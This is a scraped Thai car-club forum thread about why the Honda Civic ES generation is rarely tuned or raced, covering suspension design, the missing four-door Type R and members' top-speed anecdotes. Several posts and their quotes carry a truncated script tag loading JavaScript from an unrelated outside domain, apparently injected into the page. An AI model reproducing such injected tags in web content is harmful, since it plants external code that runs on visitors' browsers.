ตอบ
tokmun002


ชื่อเล่น: โอ

เข้าร่วม: 11 พฤษภาคม 2012
ตอบ: 1737

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1331
ให้คำขอบคุณ: 1705

ที่อยู่: พระประแดง
ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 14 กรกฎา 2012 08:03 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
Bonesrs พิมพ์ว่า:
tokmun002 พิมพ์ว่า:
ซื้อหนังสืออ๊อฟชั่นเกี่ยวกับตำราแต่งcivic. แม่จ้าวมีทุกรุ่นแต่ไม่มีesทั้งเล่มมีคันเดียว



ใช่ๆ ผมไปหาซื้อที่งาน บอกไม่มี แถม สูญญากาศติดทะเบียนรถ มี ฮอนด้าทุกรุ่น แต่ไม่มี ES



รึว่าesเราเป็นของฮุนได!! ฮอนด้าซื้อลิขสิทธิมา???? <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Bonesrs 
Shoke


ชื่อเล่น: โช้คอัพ

เข้าร่วม: 31 กรกฎา 2008
ตอบ: 1444

Administrator
Administrator

ได้รับคำขอบคุณ: 6862
ให้คำขอบคุณ: 2301

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
เสาร์, 14 กรกฎา 2012 10:10 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
สมัย es เรา ญี่ปุ่นเค้าเน้นเป็นรุ่นประหยัดพลังงาน+ไฮบริดครับ และก็ไม่มี Type R

ส่วนที่ไม่ค่อยมีคนเอาลงสนาม เพราะช่วงล่างไม่เหมาะกับเอาลงแข่งครับ

"ช่วงล่างอีเอสเป็นแบบปีกนก 2 ชั้น เอามาแข่งไม่ดี" คำพูดพี่เอกประวัติ
ได้รับคำขอบคุณจาก: Bonesrs  zaleng  jacky19 
Bonesrs


ชื่อเล่น: บอล

เข้าร่วม: 01 ตุลา 2011
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 46
ให้คำขอบคุณ: 49

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
เสาร์, 14 กรกฎา 2012 11:13 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
tokmun002 พิมพ์ว่า:
Bonesrs พิมพ์ว่า:
tokmun002 พิมพ์ว่า:
ซื้อหนังสืออ๊อฟชั่นเกี่ยวกับตำราแต่งcivic. แม่จ้าวมีทุกรุ่นแต่ไม่มีesทั้งเล่มมีคันเดียว



ใช่ๆ ผมไปหาซื้อที่งาน บอกไม่มี แถม สูญญากาศติดทะเบียนรถ มี ฮอนด้าทุกรุ่น แต่ไม่มี ES



รึว่าesเราเป็นของฮุนได!! ฮอนด้าซื้อลิขสิทธิมา???? <script src="https://sport32news.com/civicesgroup.js"></

โหก็ Honda ละครับ แต่เน้้นไว้ให้ไปรับสาวมาก กว่า

อ้างอิงจาก:

Shokeสมัย es เรา ญี่ปุ่นเค้าเน้นเป็นรุ่นประหยัดพลังงาน+ไฮบริดครับ และก็ไม่มี Type R

ส่วนที่ไม่ค่อยมีคนเอาลงสนาม เพราะช่วงล่างไม่เหมาะกับเอาลงแข่งครับ

"ช่วงล่างอีเอสเป็นแบบปีกนก 2 ชั้น เอามาแข่งไม่ดี" คำพูดพี่เอกประวัติ

เป็นเช่นนี้เอง ถึงว่าวิ่งไปพอใกล้ถึง 200Kmh แล้วมันสั่นๆ  55555<script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
Ekprawat


เข้าร่วม: 13 ตุลา 2008
ตอบ: 80

Racer
สมาชิกสับสน

ได้รับคำขอบคุณ: 1393
ให้คำขอบคุณ: 152

ที่อยู่: กทม.
ปี: 2005
อาทิตย์, 15 กรกฎา 2012 00:26 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
ขอเพิ่มเติมและแก้ไขหน่อย
รถแข่งที่วิ่งอยู่หัวแถวในแต่ละรุ่นมีการปรับปรุงเปลี่ยนแปลงจนแทบจะไม่เหลือของเดิม ไม่ว่าจะ EG EK EP3 DC5 FD2 รวมทั้ง ES ไม่มีรถคันไหนที่เป็นรถเดิมๆ แล้วจะมาแข่งตามกติกาที่อนุญาติให้ปรับแต่งได้ ยิ่งถ้าเป็นระดับนานาชาติ เช่น WTCC WRC หรือ BTCC มีการปรับแต่ง พัฒนาโดยทีมงานของบริษัทเอง หรือ บุคคลภายนอก ด้วยเงินมหาศาล เพื่อที่จะให้รถของตัวเองสามารถสู้กับรถที่เกิดมาได้เปรียบกว่า เช่น Chevrolet Cruz ครั้งแรกคงไม่มีใครคิดว่าจะได้แชมป์โลก WTCC แต่การปรับปรุงพัฒนารถโดยทีมงานที่มีความชำนาญก็สามารถทำให้รถบ้านๆก็ชนะได้ แต่ก็ต้องมีงบมหาศาลนะ
แต่คำถามที่ว่า ES หายไปไหน ข้อแรกคงเป็นเพราะว่าในเจนเนอเรชั่นนี้ไม่มี Type R 4 ประตู และเป็นการเปลี่ยนแปลงระบบช่วงล่างจาก ปีกนก 2 ชั้น มาเป็น แมคเฟอร์ซั่นสตรัท  (อันนี้แก้ไขที่น้องๆโพสต์ไว้ว่า อีเอสเป็นปีกนก 2 ชั้น น่าจะบอกว่าอีเอสไม่ใช่ปีกนก 2 ชั้นมากกว่า) ซึ่งระบบช่วงล่างที่อยู่ใน ES EP3 DC5 เป็นระบบเดียวกัน ต่างกันที่ระยะต่างๆ และระบบนี้ไม่ได้สร้างความได้เปรียบให้ Honda เหมือนที่เคยเป็นอย่าง EG หรือ EK ดังนั้นในเจนเนอเรชั่นนี้จะทำรถแข่งก็คงต้องหารุ่นที่น่าจะเหมาะที่สุดก็คือ Type R จาก EP3 หรือ DC5 ซึ่งช่วงล่างก็ไม่ได้พิเศษมากมายอะไร จะมีดีก็เครื่องกับเกียร์ ของแต่งไม่ว่าจะเครื่องช่วงล่างหรือตัวถังก็จะมีใน 2รุ่นนั้น และในช่วงเวลานั้นโรงงานเองก็ไม่ได้ส่งรถแข่ง WTCC ซึ่งใช้รถ 4 ประตู คงมีแค่ CL7 จากทีมที่โรงงานสนับสนุน นี่ก็คงเป็นเหตุผลหลักที่ไม่เห็น ES ในสนามแข่ง และใครก็ตามที่ต้องการใช้ ES ทำรถแข่งก็ต้องพัฒนารถตัวเองให้เปํนไปตามกติกา และอย่างที่บอกเราไม่มี Type R 4ประตูดังนั้นถ้าไม่สามารถยืมมาจากพวก 2 ประตูได้ ก็แปลว่าต้องสร้างขึ้นเอง ที่ชัดเจนที่สุดคือตัวถัง ในโลกนี้ไม่มีสำนักแต่งรายไหนทำบอดี้พาร์ทสำหรับ ES เลย เพราะฉนั้นทุกชิ้นสร้างเองแน่นอน ช่วงล่างที่มีน้องๆบอกว่าพี่ยก FD2 ใส่นัน้ถูกต้องแต่เฉพาะด้านหน้า แต่ก็อย่างที่บอกต้องมีการปรับปรุงไม่ใช่ยกมาใส่แล้วจะดีเลย FD2 เองก็เป็นแมคเฟอร์ซั่นสตรัทเหมือน ES เพียงแต่เปลี่ยนจุดยึดบางอย่าง เหตุผลหลักที่พี่เปลี่ยนเพราะสามารถหาอะไหล่ง่ายกว่าใช้ของ DC5 เพราะใช้อันไหนกํต้องเอาปรับปรุงใหม่อยู่ดี ไม่สามารถใช้แข่งได้เลย รถแข่งมีองค์ประกอบที่จะทำให้ประสบความสำเร็จเยอะมากๆ ดังนัน้คนส่วนใหญ่จะเลือกรุ่นที่มีหลายๆคนช่วยกันลองผิดลองถูก มันง่ายกว่ากันเยอะ แต่ถ้าใช้รถไม่เหมือนคนอื่นมาอยู่หัวแถวได้พี่ว่าก็น่าจะดีใจนะ ขนาดวิศวกรของMUGENที่มาเมืองไทยยังงงเลย บอกว่าไม่น่าเชื่อว่าจะมี ES มาสู้กับรุ่นอื่นๆได้ น่าดีใจมั๊ยละ แต่สำหรับพี่ดีใจที่สุดก็ตรงที่มีน้องๆใน CIVIC ES GROUPมาเชียร์นัั่นแหละ ทั้งหมดนี้คงพออธิบายได้ว่าทำไมหา ES ในสนามแข่งแทบไม่มี ถ้าอยากเห็นเยอะๆก็ต้องช่วยกันทำมาลงแข่งกัน
ได้รับคำขอบคุณจาก: prodrive  Shoke  zaleng  gittikhun  lkki5  Bonesrs  Edan  jacky19 
prodrive


เข้าร่วม: 28 พฤศจิกา 2008
ตอบ: 742

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1271
ให้คำขอบคุณ: 1000

ที่อยู่: URT>>>BKK.RAMINTRA39
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 15 กรกฎา 2012 00:30 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
Ekprawat พิมพ์ว่า:
ขอเพิ่มเติมและแก้ไขหน่อย
รถแข่งที่วิ่งอยู่หัวแถวในแต่ละรุ่นมีการปรับปรุงเปลี่ยนแปลงจนแทบจะไม่เหลือของเดิม ไม่ว่าจะ EG EK EP3 DC5 FD2 รวมทั้ง ES ไม่มีรถคันไหนที่เป็นรถเดิมๆ แล้วจะมาแข่งตามกติกาที่อนุญาติให้ปรับแต่งได้ ยิ่งถ้าเป็นระดับนานาชาติ เช่น WTCC WRC หรือ BTCC มีการปรับแต่ง พัฒนาโดยทีมงานของบริษัทเอง หรือ บุคคลภายนอก ด้วยเงินมหาศาล เพื่อที่จะให้รถของตัวเองสามารถสู้กับรถที่เกิดมาได้เปรียบกว่า เช่น Chevrolet Cruz ครั้งแรกคงไม่มีใครคิดว่าจะได้แชมป์โลก WTCC แต่การปรับปรุงพัฒนารถโดยทีมงานที่มีความชำนาญก็สามารถทำให้รถบ้านๆก็ชนะได้ แต่ก็ต้องมีงบมหาศาลนะ
แต่คำถามที่ว่า ES หายไปไหน ข้อแรกคงเป็นเพราะว่าในเจนเนอเรชั่นนี้ไม่มี Type R 4 ประตู และเป็นการเปลี่ยนแปลงระบบช่วงล่างจาก ปีกนก 2 ชั้น มาเป็น แมคเฟอร์ซั่นสตรัท  (อันนี้แก้ไขที่น้องๆโพสต์ไว้ว่า อีเอสเป็นปีกนก 2 ชั้น น่าจะบอกว่าอีเอสไม่ใช่ปีกนก 2 ชั้นมากกว่า) ซึ่งระบบช่วงล่างที่อยู่ใน ES EP3 DC5 เป็นระบบเดียวกัน ต่างกันที่ระยะต่างๆ และระบบนี้ไม่ได้สร้างความได้เปรียบให้ Honda เหมือนที่เคยเป็นอย่าง EG หรือ EK ดังนั้นในเจนเนอเรชั่นนี้จะทำรถแข่งก็คงต้องหารุ่นที่น่าจะเหมาะที่สุดก็คือ Type R จาก EP3 หรือ DC5 ซึ่งช่วงล่างก็ไม่ได้พิเศษมากมายอะไร จะมีดีก็เครื่องกับเกียร์ ของแต่งไม่ว่าจะเครื่องช่วงล่างหรือตัวถังก็จะมีใน 2รุ่นนั้น และในช่วงเวลานั้นโรงงานเองก็ไม่ได้ส่งรถแข่ง WTCC ซึ่งใช้รถ 4 ประตู คงมีแค่ CL7 จากทีมที่โรงงานสนับสนุน นี่ก็คงเป็นเหตุผลหลักที่ไม่เห็น ES ในสนามแข่ง และใครก็ตามที่ต้องการใช้ ES ทำรถแข่งก็ต้องพัฒนารถตัวเองให้เปํนไปตามกติกา และอย่างที่บอกเราไม่มี Type R 4ประตูดังนั้นถ้าไม่สามารถยืมมาจากพวก 2 ประตูได้ ก็แปลว่าต้องสร้างขึ้นเอง ที่ชัดเจนที่สุดคือตัวถัง ในโลกนี้ไม่มีสำนักแต่งรายไหนทำบอดี้พาร์ทสำหรับ ES เลย เพราะฉนั้นทุกชิ้นสร้างเองแน่นอน ช่วงล่างที่มีน้องๆบอกว่าพี่ยก FD2 ใส่นัน้ถูกต้องแต่เฉพาะด้านหน้า แต่ก็อย่างที่บอกต้องมีการปรับปรุงไม่ใช่ยกมาใส่แล้วจะดีเลย FD2 เองก็เป็นแมคเฟอร์ซั่นสตรัทเหมือน ES เพียงแต่เปลี่ยนจุดยึดบางอย่าง เหตุผลหลักที่พี่เปลี่ยนเพราะสามารถหาอะไหล่ง่ายกว่าใช้ของ DC5 เพราะใช้อันไหนกํต้องเอาปรับปรุงใหม่อยู่ดี ไม่สามารถใช้แข่งได้เลย รถแข่งมีองค์ประกอบที่จะทำให้ประสบความสำเร็จเยอะมากๆ ดังนัน้คนส่วนใหญ่จะเลือกรุ่นที่มีหลายๆคนช่วยกันลองผิดลองถูก มันง่ายกว่ากันเยอะ แต่ถ้าใช้รถไม่เหมือนคนอื่นมาอยู่หัวแถวได้พี่ว่าก็น่าจะดีใจนะ ขนาดวิศวกรของMUGENที่มาเมืองไทยยังงงเลย บอกว่าไม่น่าเชื่อว่าจะมี ES มาสู้กับรุ่นอื่นๆได้ น่าดีใจมั๊ยละ แต่สำหรับพี่ดีใจที่สุดก็ตรงที่มีน้องๆใน CIVIC ES GROUPมาเชียร์นัั่นแหละ ทั้งหมดนี้คงพออธิบายได้ว่าทำไมหา ES ในสนามแข่งแทบไม่มี ถ้าอยากเห็นเยอะๆก็ต้องช่วยกันทำมาลงแข่งกัน


กระจ่างแจ่มใสเลยครับพี่
Shoke


ชื่อเล่น: โช้คอัพ

เข้าร่วม: 31 กรกฎา 2008
ตอบ: 1444

Administrator
Administrator

ได้รับคำขอบคุณ: 6862
ให้คำขอบคุณ: 2301

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 15 กรกฎา 2012 02:00 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
พูดปุ๊บก็มาเลยครับพี่เอก ผมพิมพ์หล่นเองค้าบ พักนี้ออนในโทรศัพม์ขออภัย เพื่อนๆอ่านโพสพี่เอกเลยคับ
Bonesrs


ชื่อเล่น: บอล

เข้าร่วม: 01 ตุลา 2011
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 46
ให้คำขอบคุณ: 49

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
อาทิตย์, 15 กรกฎา 2012 22:21 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
Ekprawat พิมพ์ว่า:
ขอเพิ่มเติมและแก้ไขหน่อย
รถแข่งที่วิ่งอยู่หัวแถวในแต่ละรุ่นมีการปรับปรุงเปลี่ยนแปลงจนแทบจะไม่เหลือของเดิม ไม่ว่าจะ EG EK EP3 DC5 FD2 รวมทั้ง ES ไม่มีรถคันไหนที่เป็นรถเดิมๆ แล้วจะมาแข่งตามกติกาที่อนุญาติให้ปรับแต่งได้ ยิ่งถ้าเป็นระดับนานาชาติ เช่น WTCC WRC หรือ BTCC มีการปรับแต่ง พัฒนาโดยทีมงานของบริษัทเอง หรือ บุคคลภายนอก ด้วยเงินมหาศาล เพื่อที่จะให้รถของตัวเองสามารถสู้กับรถที่เกิดมาได้เปรียบกว่า เช่น Chevrolet Cruz ครั้งแรกคงไม่มีใครคิดว่าจะได้แชมป์โลก WTCC แต่การปรับปรุงพัฒนารถโดยทีมงานที่มีความชำนาญก็สามารถทำให้รถบ้านๆก็ชนะได้ แต่ก็ต้องมีงบมหาศาลนะ
แต่คำถามที่ว่า ES หายไปไหน ข้อแรกคงเป็นเพราะว่าในเจนเนอเรชั่นนี้ไม่มี Type R 4 ประตู และเป็นการเปลี่ยนแปลงระบบช่วงล่างจาก ปีกนก 2 ชั้น มาเป็น แมคเฟอร์ซั่นสตรัท  (อันนี้แก้ไขที่น้องๆโพสต์ไว้ว่า อีเอสเป็นปีกนก 2 ชั้น น่าจะบอกว่าอีเอสไม่ใช่ปีกนก 2 ชั้นมากกว่า) ซึ่งระบบช่วงล่างที่อยู่ใน ES EP3 DC5 เป็นระบบเดียวกัน ต่างกันที่ระยะต่างๆ และระบบนี้ไม่ได้สร้างความได้เปรียบให้ Honda เหมือนที่เคยเป็นอย่าง EG หรือ EK ดังนั้นในเจนเนอเรชั่นนี้จะทำรถแข่งก็คงต้องหารุ่นที่น่าจะเหมาะที่สุดก็คือ Type R จาก EP3 หรือ DC5 ซึ่งช่วงล่างก็ไม่ได้พิเศษมากมายอะไร จะมีดีก็เครื่องกับเกียร์ ของแต่งไม่ว่าจะเครื่องช่วงล่างหรือตัวถังก็จะมีใน 2รุ่นนั้น และในช่วงเวลานั้นโรงงานเองก็ไม่ได้ส่งรถแข่ง WTCC ซึ่งใช้รถ 4 ประตู คงมีแค่ CL7 จากทีมที่โรงงานสนับสนุน นี่ก็คงเป็นเหตุผลหลักที่ไม่เห็น ES ในสนามแข่ง และใครก็ตามที่ต้องการใช้ ES ทำรถแข่งก็ต้องพัฒนารถตัวเองให้เปํนไปตามกติกา และอย่างที่บอกเราไม่มี Type R 4ประตูดังนั้นถ้าไม่สามารถยืมมาจากพวก 2 ประตูได้ ก็แปลว่าต้องสร้างขึ้นเอง ที่ชัดเจนที่สุดคือตัวถัง ในโลกนี้ไม่มีสำนักแต่งรายไหนทำบอดี้พาร์ทสำหรับ ES เลย เพราะฉนั้นทุกชิ้นสร้างเองแน่นอน ช่วงล่างที่มีน้องๆบอกว่าพี่ยก FD2 ใส่นัน้ถูกต้องแต่เฉพาะด้านหน้า แต่ก็อย่างที่บอกต้องมีการปรับปรุงไม่ใช่ยกมาใส่แล้วจะดีเลย FD2 เองก็เป็นแมคเฟอร์ซั่นสตรัทเหมือน ES เพียงแต่เปลี่ยนจุดยึดบางอย่าง เหตุผลหลักที่พี่เปลี่ยนเพราะสามารถหาอะไหล่ง่ายกว่าใช้ของ DC5 เพราะใช้อันไหนกํต้องเอาปรับปรุงใหม่อยู่ดี ไม่สามารถใช้แข่งได้เลย รถแข่งมีองค์ประกอบที่จะทำให้ประสบความสำเร็จเยอะมากๆ ดังนัน้คนส่วนใหญ่จะเลือกรุ่นที่มีหลายๆคนช่วยกันลองผิดลองถูก มันง่ายกว่ากันเยอะ แต่ถ้าใช้รถไม่เหมือนคนอื่นมาอยู่หัวแถวได้พี่ว่าก็น่าจะดีใจนะ ขนาดวิศวกรของMUGENที่มาเมืองไทยยังงงเลย บอกว่าไม่น่าเชื่อว่าจะมี ES มาสู้กับรุ่นอื่นๆได้ น่าดีใจมั๊ยละ แต่สำหรับพี่ดีใจที่สุดก็ตรงที่มีน้องๆใน CIVIC ES GROUPมาเชียร์นัั่นแหละ ทั้งหมดนี้คงพออธิบายได้ว่าทำไมหา ES ในสนามแข่งแทบไม่มี ถ้าอยากเห็นเยอะๆก็ต้องช่วยกันทำมาลงแข่งกัน

ขอบคุณครับที่พี่ เสียสละ มาตอบคำถามให้ ผมเข้าใจบ้างแล้วครับ ขอสรุปในแบบที่ผมเข้าใจนะครับ  ว่า es เราแต่งแล้วไม่สามารถอ้างอิงสไตร์ใหน สำนักแต่ง อะไร หรือ แนวใหน ใช่หรือปว่าวครับ    ขอยกตัวอย่างเพิ่มครับเช่น    Mitsubishi Evolution บ้านเราก็คือ E-Car ถ้า E-Car ต้องการแต่งก็อ้างอิงจาก Mitsubishi Evolution จะ I   II   III  หรืออะไรก็ว่ากันไป     ถ้าเป็น 3 Door ก็จะอิง Spoon หรือ Mugen     ถ้าเป็น FD ก็อิง Type R ,  Mugen    ทำนองนี้หรือปว่าวครับ  ส่วนรถผมข้างหลังติด เพลท Ferio  และ  Rs นี่คือ  แต่ บอกรุ่นเฉยๆ  ไม่ได้บ่งบอกอะไรใช่หรือปว่าครับ
jacky19


ชื่อเล่น: แก๊ส

เข้าร่วม: 24 สิงหา 2009
ตอบ: 612

Guru ES
Guru ES

ได้รับคำขอบคุณ: 568
ให้คำขอบคุณ: 602

ที่อยู่: นนท์
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 15 กรกฎา 2012 23:36 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
Ekprawat พิมพ์ว่า:
ขอเพิ่มเติมและแก้ไขหน่อย
รถแข่งที่วิ่งอยู่หัวแถวในแต่ละรุ่นมีการปรับปรุงเปลี่ยนแปลงจนแทบจะไม่เหลือของเดิม ไม่ว่าจะ EG EK EP3 DC5 FD2 รวมทั้ง ES ไม่มีรถคันไหนที่เป็นรถเดิมๆ แล้วจะมาแข่งตามกติกาที่อนุญาติให้ปรับแต่งได้ ยิ่งถ้าเป็นระดับนานาชาติ เช่น WTCC WRC หรือ BTCC มีการปรับแต่ง พัฒนาโดยทีมงานของบริษัทเอง หรือ บุคคลภายนอก ด้วยเงินมหาศาล เพื่อที่จะให้รถของตัวเองสามารถสู้กับรถที่เกิดมาได้เปรียบกว่า เช่น Chevrolet Cruz ครั้งแรกคงไม่มีใครคิดว่าจะได้แชมป์โลก WTCC แต่การปรับปรุงพัฒนารถโดยทีมงานที่มีความชำนาญก็สามารถทำให้รถบ้านๆก็ชนะได้ แต่ก็ต้องมีงบมหาศาลนะ
แต่คำถามที่ว่า ES หายไปไหน ข้อแรกคงเป็นเพราะว่าในเจนเนอเรชั่นนี้ไม่มี Type R 4 ประตู และเป็นการเปลี่ยนแปลงระบบช่วงล่างจาก ปีกนก 2 ชั้น มาเป็น แมคเฟอร์ซั่นสตรัท  (อันนี้แก้ไขที่น้องๆโพสต์ไว้ว่า อีเอสเป็นปีกนก 2 ชั้น น่าจะบอกว่าอีเอสไม่ใช่ปีกนก 2 ชั้นมากกว่า) ซึ่งระบบช่วงล่างที่อยู่ใน ES EP3 DC5 เป็นระบบเดียวกัน ต่างกันที่ระยะต่างๆ และระบบนี้ไม่ได้สร้างความได้เปรียบให้ Honda เหมือนที่เคยเป็นอย่าง EG หรือ EK ดังนั้นในเจนเนอเรชั่นนี้จะทำรถแข่งก็คงต้องหารุ่นที่น่าจะเหมาะที่สุดก็คือ Type R จาก EP3 หรือ DC5 ซึ่งช่วงล่างก็ไม่ได้พิเศษมากมายอะไร จะมีดีก็เครื่องกับเกียร์ ของแต่งไม่ว่าจะเครื่องช่วงล่างหรือตัวถังก็จะมีใน 2รุ่นนั้น และในช่วงเวลานั้นโรงงานเองก็ไม่ได้ส่งรถแข่ง WTCC ซึ่งใช้รถ 4 ประตู คงมีแค่ CL7 จากทีมที่โรงงานสนับสนุน นี่ก็คงเป็นเหตุผลหลักที่ไม่เห็น ES ในสนามแข่ง และใครก็ตามที่ต้องการใช้ ES ทำรถแข่งก็ต้องพัฒนารถตัวเองให้เปํนไปตามกติกา และอย่างที่บอกเราไม่มี Type R 4ประตูดังนั้นถ้าไม่สามารถยืมมาจากพวก 2 ประตูได้ ก็แปลว่าต้องสร้างขึ้นเอง ที่ชัดเจนที่สุดคือตัวถัง ในโลกนี้ไม่มีสำนักแต่งรายไหนทำบอดี้พาร์ทสำหรับ ES เลย เพราะฉนั้นทุกชิ้นสร้างเองแน่นอน ช่วงล่างที่มีน้องๆบอกว่าพี่ยก FD2 ใส่นัน้ถูกต้องแต่เฉพาะด้านหน้า แต่ก็อย่างที่บอกต้องมีการปรับปรุงไม่ใช่ยกมาใส่แล้วจะดีเลย FD2 เองก็เป็นแมคเฟอร์ซั่นสตรัทเหมือน ES เพียงแต่เปลี่ยนจุดยึดบางอย่าง เหตุผลหลักที่พี่เปลี่ยนเพราะสามารถหาอะไหล่ง่ายกว่าใช้ของ DC5 เพราะใช้อันไหนกํต้องเอาปรับปรุงใหม่อยู่ดี ไม่สามารถใช้แข่งได้เลย รถแข่งมีองค์ประกอบที่จะทำให้ประสบความสำเร็จเยอะมากๆ ดังนัน้คนส่วนใหญ่จะเลือกรุ่นที่มีหลายๆคนช่วยกันลองผิดลองถูก มันง่ายกว่ากันเยอะ แต่ถ้าใช้รถไม่เหมือนคนอื่นมาอยู่หัวแถวได้พี่ว่าก็น่าจะดีใจนะ ขนาดวิศวกรของMUGENที่มาเมืองไทยยังงงเลย บอกว่าไม่น่าเชื่อว่าจะมี ES มาสู้กับรุ่นอื่นๆได้ น่าดีใจมั๊ยละ แต่สำหรับพี่ดีใจที่สุดก็ตรงที่มีน้องๆใน CIVIC ES GROUPมาเชียร์นัั่นแหละ ทั้งหมดนี้คงพออธิบายได้ว่าทำไมหา ES ในสนามแข่งแทบไม่มี ถ้าอยากเห็นเยอะๆก็ต้องช่วยกันทำมาลงแข่งกัน



สุดยอดคับ
Golfzaa


ชื่อเล่น: กอล์ฟครับ

เข้าร่วม: 17 พฤษภาคม 2012
ตอบ: 486

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 826
ให้คำขอบคุณ: 633

ที่อยู่: เมืองแห่งนักปราชญ์ อุบลราชธานี
ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
จันทร์, 16 กรกฎา 2012 21:18 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
matmann พิมพ์ว่า:

Bonesrs พิมพ์ว่า:

prodrive พิมพ์ว่า:

Bonesrs พิมพ์ว่า:

Nung_Sodapop พิมพ์ว่า:
ES แต่ง วิ่งบนท้องถนนดูโดดเด่นดีครับ ใครว่า Gen7 ไม่มีแนวทาง

3D FD ส่วนใหญ่ก็จะแต่งกันอยู่แล้ว

3D EK จะออกแนวซิ่้งๆ

FD จะออกแนวสวยงาม

ES จะประมาณ ทั้งสวย ทั้งซิ่ง มองได้ 2 มุม


เยี่ยมครับ นึกว่าจะเป็นรถนอกสายตาของที่มนักแข่ง จะให้ดีพวกเรารวมตัวกันสงสนามไปเบียดพวก EK FD กันมั้ง ไม่เน้นชนะ แต่ขอ ออกสื่อให้เห็นกันมั้ง +ให้ครับ

Tiv พิมพ์ว่า:
ผมก็เคยอ่านเจอในหนังสือนะesเมืองนอกเยอะมากเอาบอดี้ไปวางทำเป็นขับหลังเลย

ใช่พี่ผมลองมองแล้ว ถ้าES เรามีของแต่งเยอะๆ หาง่ายๆ ผมว่าจะสวยมากเลยครับ ดูจากคลิบ แ้ล้วเค้าก็วิ่งกัน ใกล้ๆ200กันก็มีนะ เดิมๆด้วย แต่นานหน่อย +ให้ครับ


Standard vtec1.7 เดิม เกียรธรรมดา 220ทุกคันครับ

โอ้วแม่เจ้า ผมเกียรAuto รู้ว่าเครื่องแรงแต่ไม่ มั้น กับไอ้เกียร์เจ้าัปัญหา ไม่กล้าเหยียบเคยเห็นสุดแค่ 160 (รถผมเอง) ก็ไม่กล้าต่อแล้วกลัวเกียร์พัง +ให้ครับ

ของผม 01 1.7 Auto ลาก ๆ หน่อย ดันได้ถึุง 190กว่า ๆ ครับ ลองมาแล้ว จากเส้นไปประจวบ ตรง ๆ ยาว ๆ <script src="https://sport32news.com/civicesgroup.js"></


รถผมเองลองมาบ่อยครับ AUTO D3 วิ่งเกือบ200 พอผลักขึ้น D ร่วงลง170แต่ก็ค่อยๆขึ้น มันก็ไม่จี๊ดเหมือนตอน D3 รู้สึกว่าพวงมาลัยมันหนึบขึ้นด้วย (เกี่ยวกันไหมครับ) 
Bonesrs


ชื่อเล่น: บอล

เข้าร่วม: 01 ตุลา 2011
ตอบ: 99

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 46
ให้คำขอบคุณ: 49

ปี: 2002
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
จันทร์, 16 กรกฎา 2012 22:07 - อยากรู้ Civic ES อยู่ใน Generation เท่าไรของการแต่งรถ
Golfzaa พิมพ์ว่า:
matmann พิมพ์ว่า:

Bonesrs พิมพ์ว่า:

prodrive พิมพ์ว่า:

Bonesrs พิมพ์ว่า:

Nung_Sodapop พิมพ์ว่า:
ES แต่ง วิ่งบนท้องถนนดูโดดเด่นดีครับ ใครว่า Gen7 ไม่มีแนวทาง

3D FD ส่วนใหญ่ก็จะแต่งกันอยู่แล้ว

3D EK จะออกแนวซิ่้งๆ

FD จะออกแนวสวยงาม

ES จะประมาณ ทั้งสวย ทั้งซิ่ง มองได้ 2 มุม


เยี่ยมครับ นึกว่าจะเป็นรถนอกสายตาของที่มนักแข่ง จะให้ดีพวกเรารวมตัวกันสงสนามไปเบียดพวก EK FD กันมั้ง ไม่เน้นชนะ แต่ขอ ออกสื่อให้เห็นกันมั้ง +ให้ครับ

Tiv พิมพ์ว่า:
ผมก็เคยอ่านเจอในหนังสือนะesเมืองนอกเยอะมากเอาบอดี้ไปวางทำเป็นขับหลังเลย

ใช่พี่ผมลองมองแล้ว ถ้าES เรามีของแต่งเยอะๆ หาง่ายๆ ผมว่าจะสวยมากเลยครับ ดูจากคลิบ แ้ล้วเค้าก็วิ่งกัน ใกล้ๆ200กันก็มีนะ เดิมๆด้วย แต่นานหน่อย +ให้ครับ


Standard vtec1.7 เดิม เกียรธรรมดา 220ทุกคันครับ

โอ้วแม่เจ้า ผมเกียรAuto รู้ว่าเครื่องแรงแต่ไม่ มั้น กับไอ้เกียร์เจ้าัปัญหา ไม่กล้าเหยียบเคยเห็นสุดแค่ 160 (รถผมเอง) ก็ไม่กล้าต่อแล้วกลัวเกียร์พัง +ให้ครับ

ของผม 01 1.7 Auto ลาก ๆ หน่อย ดันได้ถึุง 190กว่า ๆ ครับ ลองมาแล้ว จากเส้นไปประจวบ ตรง ๆ ยาว ๆ <script src="https://sport32news.com/civicesgroup.js"></


รถผมเองลองมาบ่อยครับ AUTO D3 วิ่งเกือบ200 พอผลักขึ้น D ร่วงลง170แต่ก็ค่อยๆขึ้น มันก็ไม่จี๊ดเหมือนตอน D3 รู้สึกว่าพวงมาลัยมันหนึบขึ้นด้วย (เกี่ยวกันไหมครับ) 


โอ้วแม่เจ้า D3  วิ่ง เกือบ200
ตอบ
หน้า 2 จาก 2
ไปที่: 
